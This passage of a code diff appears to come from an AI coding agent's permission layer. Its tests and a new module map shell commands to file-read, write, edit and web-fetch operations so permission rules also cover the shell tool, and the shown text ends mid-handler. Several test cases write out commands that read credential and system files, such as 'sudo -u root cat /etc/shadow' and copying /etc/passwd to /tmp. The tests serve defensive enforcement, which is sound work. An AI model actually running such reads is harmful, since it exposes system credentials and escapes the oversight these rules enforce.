'web_fetch', domain: 'api.example.com' }, + ]); + }); + + it('curl: -o flag value not treated as URL', () => { + const ops = extractShellOperations( + 'curl -o /tmp/out.json https://api.example.com', + CWD, + ); + expect(ops).toEqual([ + { virtualTool: 'web_fetch', domain: 'api.example.com' }, + ]); + }); + + it('wget: extracts domain', () => { + const ops = extractShellOperations( + 'wget https://example.com/file.tar.gz', + CWD, + ); + expect(ops).toEqual([{ virtualTool: 'web_fetch', domain: 'example.com' }]); + }); + + it('wget: -O flag value not treated as URL', () => { + const ops = extractShellOperations( + 'wget -O /tmp/file.gz https://example.com/f.gz', + CWD, + ); + expect(ops).toEqual([{ virtualTool: 'web_fetch', domain: 'example.com' }]); + }); + + // ── sudo / prefix commands ───────────────────────────────────────────────── + + it('sudo cat: transparent wrapper', () => { + const ops = extractShellOperations('sudo cat /etc/sudoers', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/sudoers' }, + ]); + }); + + it('sudo -u user cat: strips flags before inner cmd', () => { + const ops = extractShellOperations('sudo -u root cat /etc/shadow', CWD); + expect(ops).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/shadow' }, + ]); + }); + + it('env cmd: transparent wrapper', () => { + const ops = extractShellOperations('env cat /etc/hosts', CWD); + expect(ops).toEqual([{ virtualTool: 'read_file', filePath: '/etc/hosts' }]); + }); + + it('timeout cmd: transparent wrapper', () => { + const ops = extractShellOperations( + 'timeout 30 wget https://example.com', + CWD, + ); + expect(ops).toEqual([{ virtualTool: 'web_fetch', domain: 'example.com' }]); + }); + + // ── Combination: command + redirect ─────────────────────────────────────── + + it('cat src > dst: both read and write', () => { + const ops = extractShellOperations('cat /etc/passwd > /tmp/copy', CWD); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/passwd' }, + { virtualTool: 'write_file', filePath: '/tmp/copy' }, + ]); + }); + + it('grep pattern file > out: read + write', () => { + const ops = extractShellOperations( + 'grep secret /etc/config > /tmp/out', + CWD, + ); + expect(sorted(ops)).toEqual([ + { virtualTool: 'read_file', filePath: '/etc/config' }, + { virtualTool: 'write_file', filePath: '/tmp/out' }, + ]); + }); + + // ── Variables / unresolvable patterns ───────────────────────────────────── + + it('$VAR paths are not included', () => { + const ops = extractShellOperations('cat $SECRET_FILE', CWD); + // $SECRET_FILE starts with $, filtered by looksLikePath + expect(ops).toEqual([]); + }); +}); diff --git a/packages/core/src/permissions/shell-semantics.ts b/packages/core/src/permissions/shell-semantics.ts new file mode 100644 index 000000000..414d51103 --- /dev/null +++ b/packages/core/src/permissions/shell-semantics.ts @@ -0,0 +1,1685 @@ +/** + * @license + * Copyright 2025 Qwen team + * SPDX-License-Identifier: Apache-2.0 + */ + +/** + * Shell command semantic analysis for permission matching. + * + * Analyzes simple shell commands to extract "virtual tool operations" so that + * Read / Edit / Write / WebFetch / ListFiles permission rules can match their + * shell equivalents and prevent bypass via the shell tool. + * + * @example + * extractShellOperations('cat /etc/passwd', '/home/user') + * // → [{ virtualTool: 'read_file', filePath: '/etc/passwd' }] + * + * @example + * extractShellOperations('curl https://example.com/api', '/home/user') + * // → [{ virtualTool: 'web_fetch', domain: 'example.com' }] + * + * @example + * extractShellOperations('echo hi > /etc/motd', '/home/user') + * // → [{ virtualTool: 'write_file', filePath: '/etc/motd' }] + * + * Known limitations (cannot be statically analysed): + * - Shell variable expansion: `cat $FILE` + * - Command substitution: `cat $(find .)` + * - Interpreter scripts: `python script.py`, `node x.js` + * - Pipe targets: `find . | xargs cat` + * - Complex dynamic expressions: `eval "cat $f"` + */ + +import nodePath from 'node:path'; +import os from 'node:os'; + +// ───────────────────────────────────────────────────────────────────────────── +// Types +// ───────────────────────────────────────────────────────────────────────────── + +/** + * A virtual file or network operation extracted from a shell command. + * Used to match Read / Edit / Write / WebFetch / ListFiles permission rules + * against shell commands that perform equivalent operations. + */ +export interface ShellOperation { + /** + * The virtual tool this operation maps to. + * Matches the canonical tool names used in the permission system. + */ + virtualTool: + | 'read_file' + | 'list_directory' + | 'edit' + | 'write_file' + | 'web_fetch' + | 'grep_search'; + /** Absolute file or directory path (for file operations). */ + filePath?: string; + /** Domain name without port (for web_fetch operations). */ + domain?: string; +} + +// ───────────────────────────────────────────────────────────────────────────── +// Tokenizer +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Tokenize a shell command string, respecting single/double quotes and + * backslash escapes, splitting on unquoted whitespace. + * + * The input should be a single simple command (already split from compound + * commands via `splitCompoundCommand`). + */ +function tokenize(command: string): string[] { + const tokens: string[] = []; + let current = ''; + let inSingle = false; + let inDouble = false; + let escaped = false; + + for (let i = 0; i < command.length; i++) { + const ch = command[i]!; + + if (escaped) { + current += ch; + escaped = false; + continue; + } + if (ch === '\\' && !inSingle) { + escaped = true; + continue; + } + if (ch === "'" && !inDouble) { + inSingle = !inSingle; + continue; + } + if (ch === '"' && !inSingle) { + inDouble = !inDouble; + continue; + } + if (!inSingle && !inDouble && (ch === ' ' || ch === '\t')) { + if (current) { + tokens.push(current); + current = ''; + } + continue; + } + current += ch; + } + if (current) tokens.push(current); + return tokens; +} + +// ───────────────────────────────────────────────────────────────────────────── +// Path helpers +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Resolve a path argument to an absolute POSIX-style path. + * Handles `~` home-directory expansion and relative paths. + * + * Always returns paths with forward-slash separators so that the resolved + * paths are consistent across platforms and compatible with picomatch / the + * permission rule matching system. + */ +function resolvePath(p: string, cwd: string): string { + // Normalize inputs to forward slashes for consistent cross-platform handling + const normP = p.replace(/\\/g, '/'); + const normCwd = cwd.replace(/\\/g, '/'); + + if (normP === '~' || normP.startsWith('~/')) { + const homeDir = os.homedir().replace(/\\/g, '/'); + const rest = normP.slice(1); // '' or '/some/path' + // nodePath.posix.join handles the rest correctly: + // join('C:/Users/foo', '/.ssh/id_rsa') → 'C:/Users/foo/.ssh/id_rsa' + return rest ? nodePath.posix.join(homeDir, rest) : homeDir; + } + // isAbsolute check: handle both POSIX (/foo) and Windows (C:\foo) absolute paths + if (nodePath.isAbsolute(normP) || normP.startsWith('/')) { + return normP; + } + return nodePath.posix.join(normCwd, normP); +} + +/** + * Return true if a token looks like a file/directory path argument, as + * opposed to a flag, shell variable, number, or script expression. + */ +function looksLikePath(s: string): boolean { + if (!s) return false; + // Shell variable references + if (s.startsWith('$')) return false; + // Flags + if (s.startsWith('-')) return false; + // Pure integers — likely a count/size/mode argument (e.g. -n 10, chmod 755) + if (/^\d+$/.test(s)) return false; + // Script-like expressions (awk/sed programs, brace expansions) + if (s.includes('{') || s.includes('}')) return false; + // URLs are handled separately by the web-fetch handlers + if (s.includes('://')) return false; + return true; +} + +// ───────────────────────────────────────────────────────────────────────────── +// Redirect extraction +// ───────────────────────────────────────────────────────────────────────────── + +interface RedirectResult { + readFiles: string[]; + writeFiles: string[]; +} + +/** + * Extract I/O redirections from a token array. + * + * Modifies `tokens` in-place to remove redirect operators and their targets. + * Returns the absolute paths of redirect targets as read / write operations. + * + * Handles: + * `> file` `>> file` `< file` (with or without space) + * `2> file` `2>> file` `&> file` `&>> file` + * Combined forms: `>file`, `>>file`, `2>/dev/null` + */ +function extractRedirects(tokens: string[], cwd: string): RedirectResult { + const readFiles: string[] = []; + const writeFiles: string[] = []; + const toRemove = new Set(); + + for (let i = 0; i < tokens.length; i++) { + const tok = tokens[i]!; + + // ── Separate-token redirect operators ───────────────────────────────── + if (tok === '>' || tok === '1>') { + const target = tokens[i + 1]; + if (target && looksLikePath(target)) { + writeFiles.push(resolvePath(target, cwd)); + toRemove.add(i); + toRemove.add(i + 1); + i++; + } + } else if (tok === '>>' || tok === '1>>') { + const target = tokens[i + 1]; + if (target && looksLikePath(target)) { + writeFiles.push(resolvePath(target, cwd)); + toRemove.add(i); + toRemove.add(i + 1); + i++; + } + } else if (tok === '<') { + const target = tokens[i + 1]; + if (target && looksLikePath(target)) { + readFiles.push(resolvePath(target, cwd)); + toRemove.add(i); + toRemove.add(i + 1); + i++; + } + } else if (tok === '2>' || tok === '2>>' || tok === '&>' || tok === '&>>') { + // stderr / combined redirect — consume target + const target = tokens[i + 1]; + if (target) { + if (target !== '/dev/null' && looksLikePath(target)) { + writeFiles.push(resolvePath(target, cwd)); + } + toRemove.add(i); + toRemove.add(i + 1); + i++; + } + } + // ── Combined redirect tokens without space: `>file`, `>>file`, etc. ─── + else { + const m = tok.match(/^(>>|>|2>>|2>|&>>|&>|<)(.+)$/); + if (m) { + const op = m[1]!; + const target = m[2]!; + if (target !== '/dev/null' && looksLikePath(target)) { + if (op === '<') { + readFiles.push(resolvePath(target, cwd)); + } else { + writeFiles.push(resolvePath(target, cwd)); + } + } + toRemove.add(i); + } + } + } + + // Remove redirect tokens from the array in-place + const filtered = tokens.filter((_, idx) => !toRemove.has(idx)); + tokens.length = 0; + tokens.push(...filtered); + + return { readFiles, writeFiles }; +} + +// ───────────────────────────────────────────────────────────────────────────── +// Argument parsing +// ───────────────────────────────────────────────────────────────────────────── + +/** + * Extract positional (non-flag) arguments from a token list. + * + * Flags starting with `-` are skipped. Flags listed in `flagsWithValue` + * also consume the immediately following token (their value). + */ +function getPositionalArgs( + args: string[], + flagsWithValue: ReadonlySet = new Set(), +): string[] { + const positional: string[] = []; + let skipNext = false; + + for (const arg of args) { + if (skipNext) { + skipNext = false; + continue; + } + if (!arg.startsWith('-')) { + positional.push(arg); + continue; + } + // Flag: check if it consumes the next token + if (flagsWithValue.has(arg)) { + skipNext = true; + } + // Flags combined with their value in the same token (`-n10`) are ignored + // because looksLikePath will filter out anything starting with `-`. + } + + return positional; +} + +// ───────────────────────────────────────────────────────────────────────────── +// Command handler helpers +// ───────────────────────────────────────────────────────────────────────────── + +type CommandHandler = (args: string[], cwd: string) => ShellOperation[]; + +/** Build read_file operations from positional path arguments. */ +function readOps( + args: string[], + cwd: string, + flagsWithValue?: ReadonlySet, +): ShellOperation[] { + return getPositionalArgs(args, flagsWithValue) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'read_file' as const, + filePath: resolvePath(p, cwd), + })); +} + +/** Build list_directory operations from positional path arguments. + * Defaults to cwd when no path args are given. */ +function listOps( + args: string[], + cwd: string, + flagsWithValue?: ReadonlySet, +): ShellOperation[] { + const dirs = getPositionalArgs(args, flagsWithValue).filter(looksLikePath); + if (dirs.length === 0) + return [{ virtualTool: 'list_directory', filePath: cwd }]; + return dirs.map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: resolvePath(p, cwd), + })); +} + +/** Extract URL domain and return a web_fetch operation, or null on failure. */ +function webOp(url: string): ShellOperation | null { + try { + const normalized = url.includes('://') ? url : `https://${url}`; + const domain = new URL(normalized).hostname; + return domain ? { virtualTool: 'web_fetch', domain } : null; + } catch { + return null; + } +} + +// ───────────────────────────────────────────────────────────────────────────── +// Command dispatch table +// ───────────────────────────────────────────────────────────────────────────── + +const COMMANDS: Readonly> = { + // ── File-read commands ──────────────────────────────────────────────────── + + cat: (a, d) => readOps(a, d), + tac: (a, d) => readOps(a, d), + nl: (a, d) => readOps(a, d), + zcat: (a, d) => readOps(a, d), + bzcat: (a, d) => readOps(a, d), + xzcat: (a, d) => readOps(a, d), + gzcat: (a, d) => readOps(a, d), + lzcat: (a, d) => readOps(a, d), + head: (a, d) => readOps(a, d, new Set(['-n', '-c', '--lines', '--bytes'])), + tail: (a, d) => + readOps( + a, + d, + new Set(['-n', '-c', '-s', '--lines', '--bytes', '--sleep-interval']), + ), + less: (a, d) => + readOps( + a, + d, + new Set(['-b', '-h', '-j', '-p', '-x', '-y', '-z', '--shift', '--tabs']), + ), + more: (a, d) => readOps(a, d), + most: (a, d) => readOps(a, d), + wc: (a, d) => readOps(a, d), + file: (a, d) => + readOps( + a, + d, + new Set([ + '-m', + '-e', + '-F', + '-P', + '--magic-file', + '--exclude', + '--extension', + '--separator', + ]), + ), + stat: (a, d) => + readOps( + a, + d, + new Set(['-c', '-f', '--format', '--printf', '--file-system']), + ), + readlink: (a, d) => + readOps( + a, + d, + new Set([ + '-e', + '-f', + '-m', + '-q', + '-s', + '-v', + '-z', + '--canonicalize', + '--canonicalize-existing', + '--canonicalize-missing', + '--no-newline', + '--quiet', + '--silent', + '--verbose', + '--zero', + ]), + ), + realpath: (a, d) => + readOps( + a, + d, + new Set([ + '--relative-to', + '--relative-base', + '-e', + '-m', + '-s', + '-z', + '--canonicalize-existing', + '--canonicalize-missing', + '--logical', + '--physical', + '--no-symlinks', + '--quiet', + '--strip', + '--zero', + ]), + ), + diff: (a, d) => + readOps( + a, + d, + new Set([ + '-u', + '-U', + '-c', + '-C', + '-I', + '-x', + '-X', + '-W', + '--label', + '--to-file', + '--from-file', + '--width', + '--horizon-lines', + '--strip-trailing-cr', + '--ignore-matching-lines', + '--exclude', + '--exclude-from', + ]), + ), + diff3: (a, d) => + readOps( + a, + d, + new Set([ + '-m', + '-T', + '-A', + '-E', + '-e', + '-x', + '-X', + '-3', + '-i', + '--label', + ]), + ), + sdiff: (a, d) => + readOps( + a, + d, + new Set(['-o', '-w', '-W', '-s', '-i', '-b', '-B', '-E', '-H']), + ), + cmp: (a, d) => + readOps( + a, + d, + new Set([ + '-i', + '-l', + '-n', + '-s', + '--ignore-initial', + '--bytes', + '--print-bytes', + '--quiet', + '--silent', + '--verbose', + '--zero', + ]), + ), + md5sum: (a, d) => readOps(a, d), + sha1sum: (a, d) => readOps(a, d), + sha256sum: (a, d) => readOps(a, d), + sha512sum: (a, d) => readOps(a, d), + sha224sum: (a, d) => readOps(a, d), + sha384sum: (a, d) => readOps(a, d), + cksum: (a, d) => readOps(a, d), + b2sum: (a, d) => readOps(a, d), + sum: (a, d) => readOps(a, d), + strings: (a, d) => + readOps( + a, + d, + new Set([ + '-n', + '-t', + '-e', + '-o', + '-a', + '--min-len', + '--radix', + '--encoding', + '--file', + '--print-file-name', + '--data', + '--all', + ]), + ), + hexdump: (a, d) => + readOps( + a, + d, + new Set([ + '-n', + '-s', + '-l', + '-C', + '-b', + '-c', + '-d', + '-o', + '-x', + '-e', + '-f', + '-v', + ]), + ), + xxd: (a, d) => + readOps( + a, + d, + new Set([ + '-l', + '-s', + '-c', + '-g', + '-o', + '-n', + '-b', + '-e', + '-i', + '-p', + '-r', + '-u', + '-E', + ]), + ), + od: (a, d) => + readOps( + a, + d, + new Set([ + '-N', + '-j', + '-w', + '-s', + '-t', + '-A', + '-v', + '--address-radix', + '--endian', + '--format', + '--read-bytes', + '--skip-bytes', + '--strings', + '--output-duplicates', + '--width', + ]), + ), + sort: (a, d) => + readOps( + a, + d, + new Set([ + '-k', + '-t', + '-T', + '--output', + '-o', + '--field-separator', + '--key', + '--temporary-directory', + '--compress-program', + '--batch-size', + '--parallel', + '--random-source', + '--sort', + ]), + ), + uniq: (a, d) => + readOps( + a, + d, + new Set([ + '-f', + '-s', + '-w', + '-n', + '--skip-fields', + '--skip-chars', + '--check-chars', + ]), + ), + cut: (a, d) => + readOps( + a, + d, + new Set([ + '-b', + '-c', + '-d', + '-f', + '--delimiter', + '--fields', + '--bytes', + '--characters', + '--output-delimiter', + ]), + ), + paste: (a, d) => + readOps(a, d, new Set(['-d', '-s', '--delimiters', '--serial'])), + join: (a, d) => + readOps( + a, + d, + new Set([ + '-t', + '-1', + '-2', + '-j', + '-o', + '-a', + '-e', + '--field', + '--header', + '--check-order', + '--nocheck-order', + '--zero-terminated', + ]), + ), + column: (a, d) => + readOps( + a, + d, + new Set([ + '-t', + '-s', + '-n', + '-c', + '-o', + '-x', + '--table', + '--separator', + '--output-separator', + '--fillrows', + ]), + ), + fold: (a, d) => + readOps( + a, + d, + new Set(['-w', '-b', '-s', '--width', '--bytes', '--spaces']), + ), + expand: (a, d) => readOps(a, d, new Set(['-t', '--tabs', '--initial'])), + unexpand: (a, d) => + readOps(a, d, new Set(['-t', '-a', '--tabs', '--all', '--first-only'])), + base64: (a, d) => + readOps( + a, + d, + new Set(['-d', '-i', '-w', '--decode', '--ignore-garbage', '--wrap']), + ), + base32: (a, d) => + readOps( + a, + d, + new Set(['-d', '-i', '-w', '--decode', '--ignore-garbage', '--wrap']), + ), + tr: (a, d) => readOps(a, d), + + // ── Grep / search commands ──────────────────────────────────────────────── + + grep: (args, cwd) => { + const hasPatternFlag = args.some( + (a) => + a === '-e' || a === '-f' || a.startsWith('-e') || a.startsWith('-f'), + ); + const isRecursive = args.some((a) => + ['-r', '-R', '--recursive', '--dereference-recursive'].includes(a), + ); + const flagsWithValue = new Set([ + '-e', + '-f', + '-m', + '-A', + '-B', + '-C', + '--context', + '--include', + '--exclude', + '--exclude-dir', + '--max-count', + '--after-context', + '--before-context', + '-n', + '--line-number', + '--label', + '-D', + '--devices', + '--max-depth', + '-X', + '--exclude-from', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + // If -e/-f was used, there is no positional pattern; all positionals are paths. + // Otherwise, the first positional is the pattern and the rest are paths. + const filePaths = hasPatternFlag ? positional : positional.slice(1); + const tool: 'read_file' | 'list_directory' = isRecursive + ? 'list_directory' + : 'read_file'; + return filePaths.map((p) => ({ + virtualTool: tool, + filePath: resolvePath(p, cwd), + })); + }, + egrep: (a, d) => (COMMANDS['grep'] as CommandHandler)(a, d), + fgrep: (a, d) => (COMMANDS['grep'] as CommandHandler)(a, d), + zgrep: (a, d) => (COMMANDS['grep'] as CommandHandler)(a, d), + bzgrep: (a, d) => (COMMANDS['grep'] as CommandHandler)(a, d), + + rg: (args, cwd) => { + // ripgrep: recursive by default; first non-flag positional = pattern + const hasPatternFlag = args.some((a) => a === '-e' || a === '-f'); + const flagsWithValue = new Set([ + '-e', + '-f', + '-m', + '-A', + '-B', + '-C', + '-t', + '-T', + '-g', + '--iglob', + '--glob', + '--type', + '--type-not', + '--max-count', + '--max-depth', + '--context', + '--after-context', + '--before-context', + '-M', + '--max-columns', + '--field-match-separator', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + const filePaths = hasPatternFlag ? positional : positional.slice(1); + return filePaths.map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: resolvePath(p, cwd), + })); + }, + + ag: (args, cwd) => { + const hasPatternFlag = args.some((a) => a === '-e'); + const flagsWithValue = new Set([ + '-e', + '-m', + '-A', + '-B', + '-C', + '--depth', + '--file-search-regex', + '--file-search-regex-i', + '--ignore', + '--ignore-dir', + '-n', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + const filePaths = hasPatternFlag ? positional : positional.slice(1); + return filePaths.map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: resolvePath(p, cwd), + })); + }, + + ack: (args, cwd) => { + const flagsWithValue = new Set([ + '-m', + '-A', + '-B', + '-C', + '--type', + '--ignore-dir', + '--ignore-file', + '--ignore-directory', + '-n', + ]); + // ack: first positional = pattern, rest = paths + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + return positional.slice(1).map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: resolvePath(p, cwd), + })); + }, + + // ── Directory-listing commands ──────────────────────────────────────────── + + ls: (a, d) => listOps(a, d), + dir: (a, d) => listOps(a, d), + vdir: (a, d) => listOps(a, d), + exa: (a, d) => + listOps( + a, + d, + new Set([ + '-L', + '--level', + '--sort', + '--color', + '--colour', + '--group', + '-I', + '--ignore-glob', + ]), + ), + eza: (a, d) => + listOps( + a, + d, + new Set([ + '-L', + '--level', + '--sort', + '--color', + '--colour', + '--group', + '-I', + '--ignore-glob', + ]), + ), + lsd: (a, d) => + listOps( + a, + d, + new Set([ + '--depth', + '--color', + '--icon', + '--icon-theme', + '--date', + '--size', + '--blocks', + '--header', + '--classic', + '--no-symlink', + '--ignore-glob', + '-I', + ]), + ), + + find: (args, cwd) => { + // `find [starting-point...] [expression]` + // Starting points come before any expression keyword beginning with `-` or `(`. + const expressionKeywords = new Set([ + '-name', + '-iname', + '-path', + '-ipath', + '-regex', + '-iregex', + '-type', + '-maxdepth', + '-mindepth', + '-newer', + '-mtime', + '-atime', + '-ctime', + '-size', + '-user', + '-group', + '-perm', + '-links', + '-inum', + '-exec', + '-execdir', + '-ok', + '-okdir', + '-print', + '-print0', + '-ls', + '-delete', + '-prune', + '-depth', + '-empty', + '-readable', + '-writable', + '-executable', + '-follow', + '-xdev', + '-mount', + '-true', + '-false', + '-not', + '!', + '-a', + '-and', + '-o', + '-or', + ]); + const startingPoints: string[] = []; + for (const arg of args) { + if ( + arg.startsWith('-') || + arg === '(' || + arg === ')' || + expressionKeywords.has(arg) + ) + break; + if (looksLikePath(arg)) startingPoints.push(resolvePath(arg, cwd)); + } + if (startingPoints.length === 0) { + return [{ virtualTool: 'list_directory', filePath: cwd }]; + } + return startingPoints.map((p) => ({ + virtualTool: 'list_directory' as const, + filePath: p, + })); + }, + + tree: (args, cwd) => + listOps( + args, + cwd, + new Set([ + '-L', + '-P', + '-I', + '-o', + '-n', + '-H', + '-T', + '--charset', + '--filelimit', + '--matchdirs', + '--dirsfirst', + '-J', + '-X', + '--du', + '--si', + ]), + ), + + du: (args, cwd) => + listOps( + args, + cwd, + new Set([ + '-d', + '--max-depth', + '--threshold', + '-t', + '--block-size', + '-B', + '--time-style', + '--exclude', + '-X', + '--time', + '--output', + ]), + ), + + // ── File-write commands (create or overwrite) ───────────────────────────── + + touch: (args, cwd) => + getPositionalArgs( + args, + new Set(['-t', '-r', '--reference', '--date', '-d', '--time']), + ) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'write_file' as const, + filePath: resolvePath(p, cwd), + })), + + mkdir: (args, cwd) => + getPositionalArgs(args, new Set(['-m', '--mode', '-Z', '--context'])) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'write_file' as const, + filePath: resolvePath(p, cwd), + })), + + mkfifo: (args, cwd) => + getPositionalArgs(args, new Set(['-m', '--mode', '-Z'])) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'write_file' as const, + filePath: resolvePath(p, cwd), + })), + + tee: (args, cwd) => + getPositionalArgs(args) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'write_file' as const, + filePath: resolvePath(p, cwd), + })), + + cp: (args, cwd) => { + const flagsWithValue = new Set([ + '-S', + '--suffix', + '-t', + '--target-directory', + '--backup', + '--no-target-directory', + '--sparse', + '--reflink', + '-Z', + '--context', + '--copy-contents', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + if (positional.length === 0) return []; + if (positional.length === 1) { + return [ + { + virtualTool: 'read_file', + filePath: resolvePath(positional[0]!, cwd), + }, + ]; + } + const srcs = positional.slice(0, -1); + const dst = positional[positional.length - 1]!; + return [ + ...srcs.map((p) => ({ + virtualTool: 'read_file' as const, + filePath: resolvePath(p, cwd), + })), + { virtualTool: 'write_file' as const, filePath: resolvePath(dst, cwd) }, + ]; + }, + + mv: (args, cwd) => { + const flagsWithValue = new Set([ + '-S', + '--suffix', + '-t', + '--target-directory', + '--backup', + '-Z', + '--context', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + if (positional.length < 2) return []; + const srcs = positional.slice(0, -1); + const dst = positional[positional.length - 1]!; + return [ + // The source files are edited (moved away — their original location changes) + ...srcs.map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + { virtualTool: 'write_file' as const, filePath: resolvePath(dst, cwd) }, + ]; + }, + + install: (args, cwd) => { + const flagsWithValue = new Set([ + '-m', + '--mode', + '-o', + '--owner', + '-g', + '--group', + '-S', + '--suffix', + '-t', + '--target-directory', + '-T', + '--no-target-directory', + '-Z', + '--context', + '-C', + '--compare', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + if (positional.length < 2) return []; + const dst = positional[positional.length - 1]!; + return [{ virtualTool: 'write_file', filePath: resolvePath(dst, cwd) }]; + }, + + dd: (args, cwd) => { + // dd if=input of=output — arguments are key=value pairs, not flags + const ops: ShellOperation[] = []; + for (const arg of args) { + if (arg.startsWith('if=')) { + const p = arg.slice(3); + if (looksLikePath(p)) { + ops.push({ virtualTool: 'read_file', filePath: resolvePath(p, cwd) }); + } + } else if (arg.startsWith('of=')) { + const p = arg.slice(3); + if (looksLikePath(p)) { + ops.push({ + virtualTool: 'write_file', + filePath: resolvePath(p, cwd), + }); + } + } + } + return ops; + }, + + ln: (args, cwd) => { + // ln [-s] TARGET LINKNAME — the link being created is a write operation + const positional = getPositionalArgs( + args, + new Set(['-S', '--suffix', '-t', '--target-directory', '-b', '--backup']), + ).filter(looksLikePath); + if (positional.length < 2) return []; + const linkname = positional[positional.length - 1]!; + return [ + { virtualTool: 'write_file', filePath: resolvePath(linkname, cwd) }, + ]; + }, + + // ── File-edit commands (modify or delete existing content) ──────────────── + + rm: (args, cwd) => + getPositionalArgs(args, new Set(['--interactive'])) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + + rmdir: (args, cwd) => + getPositionalArgs( + args, + new Set(['--ignore-fail-on-non-empty', '-p', '--parents']), + ) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + + unlink: (args, cwd) => + getPositionalArgs(args) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + + shred: (args, cwd) => + getPositionalArgs( + args, + new Set(['-n', '--iterations', '-s', '--size', '--random-source']), + ) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + + truncate: (args, cwd) => + getPositionalArgs( + args, + new Set([ + '-s', + '--size', + '-r', + '--reference', + '-o', + '-I', + '-c', + '--io-blocks', + '--no-create', + ]), + ) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })), + + chmod: (args, cwd) => { + // chmod [opts] MODE file... — the mode is the first positional arg. + // Apply slice(1) BEFORE filter so that numeric modes like '755' (which are + // filtered by looksLikePath) don't cause the file path to be dropped. + const positional = getPositionalArgs( + args, + new Set(['-f', '--reference', '--from']), + ); + return positional + .slice(1) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })); + }, + + chown: (args, cwd) => { + // chown [opts] OWNER[:GROUP] file... — the owner spec is the first positional. + const positional = getPositionalArgs( + args, + new Set(['--from', '--reference']), + ); + return positional + .slice(1) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })); + }, + + chgrp: (args, cwd) => { + const positional = getPositionalArgs(args, new Set(['--reference'])); + return positional + .slice(1) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })); + }, + + rename: (args, cwd) => { + // rename FROM TO file... — skip first two positionals (the from/to patterns) + const positional = getPositionalArgs(args).filter(looksLikePath); + return positional.slice(2).map((p) => ({ + virtualTool: 'edit' as const, + filePath: resolvePath(p, cwd), + })); + }, + + sed: (args, cwd) => { + // sed [-i] SCRIPT file... or sed -e SCRIPT file... + // With -i: in-place edit (virtualTool = 'edit'); otherwise read (virtualTool = 'read_file') + const hasInPlace = args.some((a) => a === '-i' || a.startsWith('-i')); + const hasExplicitScript = args.some( + (a) => a === '-e' || a === '-f' || a.startsWith('-e'), + ); + const flagsWithValue = new Set([ + '-e', + '-f', + '--expression', + '--file', + // NOTE: -i is intentionally absent — it is an optional-suffix flag + // (e.g. `-i`, `-i.bak`) and does NOT consume the next token as a value. + '-l', + '--line-length', + '--sandbox', + '-s', + '--separate', + ]); + const positional = getPositionalArgs(args, flagsWithValue).filter( + looksLikePath, + ); + // If -e/-f was used, all positionals are file paths. + // Otherwise, the first positional is the script expression. + const filePaths = hasExplicitScript ? positional : positional.slice(1); + const tool: 'edit' | 'read_file' = hasInPlace ? 'edit' : 'read_file'; + return filePaths.map((p) => ({ + virtualTool: tool, + filePath: resolvePath(p, cwd), + })); + }, + + awk: (args, cwd) => { + // awk [-F sep] [-v var=val] PROGRAM file... + // The PROGRAM is the first positional — it will contain `{...}` which is + // filtered out by looksLikePath, so we don't need special handling. + const flagsWithValue = new Set([ + '-F', + '-f', + '-v', + '-m', + '-W', + '-M', + '--source', + '--include', + '--load', + '-b', + '--characters-as-bytes', + '-c', + '--traditional', + '-d', + '-D', + '--debug', + '-e', + '--exec', + '-h', + '--help', + '-i', + '--lint', + '-o', + '-p', + '-r', + '-s', + '-S', + '-t', + '-V', + ]); + return getPositionalArgs(args, flagsWithValue) + .filter(looksLikePath) + .map((p) => ({ + virtualTool: 'read_file' as const, + filePath: resolvePath(p, cwd), + })); + }, + + // ── WebFetch commands ───────────────────────────────────────────────────── + + curl: (args) => { + const flagsWithValue = new Set([ + '-o', + '-O', + '--output', + '-u', + '--user', + '-A', + '--user-agent', + '-H', + '--header', + '-d', + '--data', + '--data-binary', + '--data-raw', + '--data-urlencode', + '-X', + '--request', + '-F', + '--form', + '-e', + '--referer', + '-T', + '--upload-file', + '--cacert', + '--capath', + '--cert', + '--key', + '--pass', + '-m', + '--max-time', + '--connect-timeout', + '-r', + '--range', + '--limit-rate', + '-b', + '--cookie', + '-c', + '--cookie-jar', + '--proxy', + '-U', + '--proxy-user', + '-K', + '--config', + '--netrc-file', + '--resolve', + '--connect-to', + '-w', + '--write-out', + '-x', + '-Y', + '--speed-limit', + '--speed-time', + '-y', + '--max-filesize', + '--proto', + '--proto-redir', + '-E', + '--cert-type', + '--key-type', + ]); + return getPositionalArgs(args, flagsWithValue) + .filter( + (p) => + p.includes('://') || /^https?:\/\//.test(p) || /^ftp:\/\//.test(p), + ) + 